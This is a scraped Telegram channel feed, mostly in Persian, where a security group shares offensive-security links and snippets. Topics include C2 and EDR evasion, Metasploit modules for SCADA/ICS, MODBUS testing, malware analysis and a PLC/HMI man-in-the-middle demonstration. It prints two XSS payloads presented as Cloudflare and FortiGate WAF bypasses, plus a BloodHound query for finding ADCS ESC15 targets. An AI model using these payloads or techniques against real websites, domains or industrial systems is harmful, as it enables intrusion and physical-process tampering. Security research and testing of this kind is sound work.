P.F.K Security
@PfkSecurity
1.61K subscribers
128 photos
38 videos
37 files
404 links
APT / Exploit / Malware / ICS / OT / Vulnerability Analysis / SE
Download Telegram
About
Blog
Apps
Platform
Join
P.F.K Security
1.61K subscribers
P.F.K Security
https://github.com/MythicAgents/sliver/blob/main/blog/blog.md

شما می توانید از این فرآیند چیزهای زیادی بیاموزید، به عنوان مثال، از edr اجتناب کنید و سرورهای تیم را پیوند دهید
GitHub
sliver/blog/blog.md at main · MythicAgents/sliver
Sliver agents for Mythic. Contribute to MythicAgents/sliver development by creating an account on GitHub.
548 views
P.F.K Security
https://github.com/saisathvik1/OSCP-Cheatsheet
GitHub
GitHub - saisathvik1/OSCP-Cheatsheet: OSCP Cheatsheet by Sai Sathvik Ruppa
OSCP Cheatsheet by Sai Sathvik Ruppa. Contribute to saisathvik1/OSCP-Cheatsheet development by creating an account on GitHub.
527 views
P.F.K Security
https://collaborate.mitre.org/attackics/index.php/Main_Page
476 views
P.F.K Security
SCADA Hacking: Metasploit SCADA Modules

به عنوان یک پنتستر/هکر ، ما منابع زیادی داریم که می‌توانیم از آنها برای آزمایش امنیت سیستم SCADA/ICS استفاده کنیم. یکی از محبوب ترین آنها فریم ورک Metasploit است.

در اینجا، من سعی کرده ام لیستی از اکثر ماژول های Metasploit که برای آزمایش/هک کردن SCADA/ICS مفید هستند را گردآوری کنم. لطفاً به خاطر داشته باشید که سایت‌های SCADA/ICS از سخت‌افزار و پروتکل‌های متنوعی استفاده می‌کنند، بنابراین شناسایی برای یک هک موفقیت‌آمیز حیاتی می‌شود. شما باید حداقل سازنده و پروتکل را بشناسید و سپس ماژول مناسب را از این لیست بیابید.
این اطلاعات در قالب زیر سازماندهی شده است.
ابزار/Exploit MSF-Update Developer/Vendor System(های) Metasploit مرجع
من معتقدم که اکثر این ستون ها با استثناهای احتمالی MSF-Update و System(s) توضیحی هستند.
ستون MSF-Update نشان می دهد که آیا ماژول هنگام به روز رسانی در Metasploit در دسترس است یا خیر. برخی از ماژول ها به طور خودکار به روز می شوند و به Metasploit Framework شما اضافه می شوند. برخی دیگر، احتمالاً باید به صورت دستی اضافه کنید.
@pfksecurity
497 views
P.F.K Security
P.F.K Security
SCADA Hacking: Metasploit SCADA Modules به عنوان یک پنتستر/هکر ، ما منابع زیادی داریم که می‌توانیم از آنها برای آزمایش امنیت سیستم SCADA/ICS استفاده کنیم. یکی از محبوب ترین آنها فریم ورک Metasploit است. در اینجا، من سعی کرده ام لیستی از اکثر ماژول های Metasploit…
ستون System(s) سیستم های آسیب پذیر در برابر ماژول اکسپلویت/اسکنر را نشان می دهد. یک بار دیگر می خواهم بر ماهیت متنوع سیستم های SCADA/ICS تاکید کنم.
لطفاً توجه داشته باشید که ماژول‌ها از ماژول‌های بهره‌برداری و ماژول‌های کمکی (عمدتاً برای recon استفاده می‌شوند) متفاوت هستند.

@pfksecurity
445 views
P.F.K Security
P.F.K Security
ستون System(s) سیستم های آسیب پذیر در برابر ماژول اکسپلویت/اسکنر را نشان می دهد. یک بار دیگر می خواهم بر ماهیت متنوع سیستم های SCADA/ICS تاکید کنم. لطفاً توجه داشته باشید که ماژول‌ها از ماژول‌های بهره‌برداری و ماژول‌های کمکی (عمدتاً برای recon استفاده می‌شوند)…
729 views
P.F.K Security
MODBUS Penetration Testing Framework

https://github.com/trouat/smod

@pfksecurity
GitHub
GitHub - trouat/smod: MODBUS Penetration Testing Framework
MODBUS Penetration Testing Framework. Contribute to trouat/smod development by creating an account on GitHub.
673 views
P.F.K Security
CLOUDFLARE BYPASS xss

PAYLOAD:

<Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ=="))>


FortiGate WAF bypass

<details open ontoggle="(()=>alertibrahimxss)()"></details>

#exploit #bypass
@pfkSecurity
609 views
P.F.K Security
BloodHound ADCS ESC15 (EKUwu) cypher query.

از این جستجوی رمزگذاری برای بررسی حقوق ثبت نام در قالب‌های گواهی استفاده کنید که الزامات حمله ADCS ESC15 (EKUwu) را که اخیراً فاش شده است را برآورده می‌کند.

MATCH p=(:Base)-[:Enroll|AllExtendedRights]->(ct:CertTemplate)-[:PublishedTo]->(:EnterpriseCA)-[:TrustedForNTAuth]->(:NTAuthStore)-[:NTAuthStoreFor]->(:Domain)
WHERE ct.enrolleesuppliessubject = True
AND ct.authenticationenabled = False
AND ct.requiresmanagerapproval = False
AND ct.schemaversion = 1
RETURN p

@PfkSecurity
581 views
P.F.K Security
https://bible.malcore.io/readme/the-beginning/introduction-to-malware
#malware
@PfkSecurity
638 views
P.F.K Security
https://harfanglab.io/insidethelab/hijackloader-abusing-genuine-certificates/
HarfangLab | Your endpoints, our protection
HijackLoader evolution: abusing genuine signing certificates
Our telemetry has revealed a significant increase in Lumma Stealer malware deployments via the HijackLoader malicious loader.
650 views
P.F.K Security
ssa-589181.pdf
34.9 KB
SSA-589181: Denial-Of-Service in SIMATIC S7-200 SMART CPU
Family Devices

@PfkSecurity
662 views
P.F.K Security
This media is not supported in your browser
VIEW IN TELEGRAM
این ویدئو یک سناریوی "MITM" را نشان می دهد که بین PLC و HMI انجام شده است. این وکتور حمله نشان می دهد که چگونه می توان کنترل کامل یک موتور (دستگاه نقطه پایانی) را به دست آورد. پس از مسموم کردن یا همون poisoning جدول arp HMI و درج مقادیر جعلی، مقادیر مطلوب را مستقیماً به PLC ارسال کردند تا نمایشی نادرست (مشابه نتایج حمله استاکس نت) ایجاد کنند.

@PfkSecurity
874 views